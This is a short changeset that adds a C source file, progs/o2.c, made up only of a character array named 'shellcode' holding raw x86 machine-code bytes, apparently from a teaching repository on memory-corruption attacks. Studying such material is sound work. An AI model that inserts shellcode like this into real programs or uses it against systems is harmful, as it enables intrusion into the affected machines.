progs/o2.c
changeset 400 f05368d007dd
--- /dev/null	Thu Jan 01 00:00:00 1970 +0000
+++ b/progs/o2.c	Thu Oct 08 12:08:10 2015 +0100
@@ -0,0 +1,5 @@
+char shellcode[] =
+ "\x55\x89\xe5\x83\xec\x14\xc7\x45\xf8\xc0\x84\x04"
+ "\x08\xc7\x45\xfc\x00\x00\x00\x00\x00\x8d\x55\xf8"
+ "\x89\x54\x24\x04\x89\x04\x34\xe8\x02\xff\xff\xff"
+ "\xc9\xc3";